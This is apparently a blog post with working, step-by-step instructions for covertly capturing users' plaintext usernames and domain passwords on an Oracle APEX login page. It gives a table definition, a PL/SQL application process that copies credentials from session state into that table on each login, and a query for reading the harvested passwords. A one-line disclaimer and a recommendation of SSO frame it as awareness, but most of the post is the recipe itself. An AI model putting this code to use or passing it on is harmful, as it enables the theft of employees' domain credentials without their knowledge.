APEX password sniffer

Y

You can easily capture user passwords when they login to your application.

So if your company use LDAP or any kind of verification, where user is filling the form with password on APEX page, you can capture it. Whenever they login you will have their login name and domain password.

I don't need to tell you that you should not do that, but you should be aware of this issue and you should avoid weak verifications if possible. The best way how to avoid this issue is to use SSO.

Steps required

• Create table for captured passwords:

  CREATE TABLE passwords (
      user_name       VARCHAR2(255)  NOT NULL,
      password        VARCHAR2(255),
      created_at      DATE,
      --
      CONSTRAINT pk_passwords PRIMARY KEY (user_name)
  );
  

• In your APEX application go to Shared Components, Application Processes and click Create.
• Select Point On Submit: After Page Submission - After Computations and Validations. Enter PL/SQL code below:

  MERGE INTO passwords t
  USING (
      SELECT
          APEX_UTIL.GET_SESSION_STATE('P9999_USERNAME')   AS user_name,
          APEX_UTIL.GET_SESSION_STATE('P9999_PASSWORD')   AS password,
          SYSDATE                                         AS created_at
      FROM DUAL
      WHERE APEX_UTIL.GET_SESSION_STATE('P9999_USERNAME') IS NOT NULL
  ) s
      ON (s.user_name = t.user_name)
  WHEN MATCHED THEN
      UPDATE SET
          t.password      = s.password,
          t.created_at    = s.created_at
  WHEN NOT MATCHED THEN
      INSERT (t.user_name, t.password, t.created_at)
      VALUES (s.user_name, s.password, s.created_at);
  

• Set Condition Type to Expression PL/SQL and Expression to:

  APEX_APPLICATION.G_FLOW_STEP_ID = 9999

• You may need to adust this if your login page have different number.
• Check results and cleanup:

  -- mischief managed
  SELECT p.*
  FROM passwords p
  ORDER BY p.created_at DESC;
  
  -- drop table and remove process from APEX
  DROP TABLE passwords PURGE;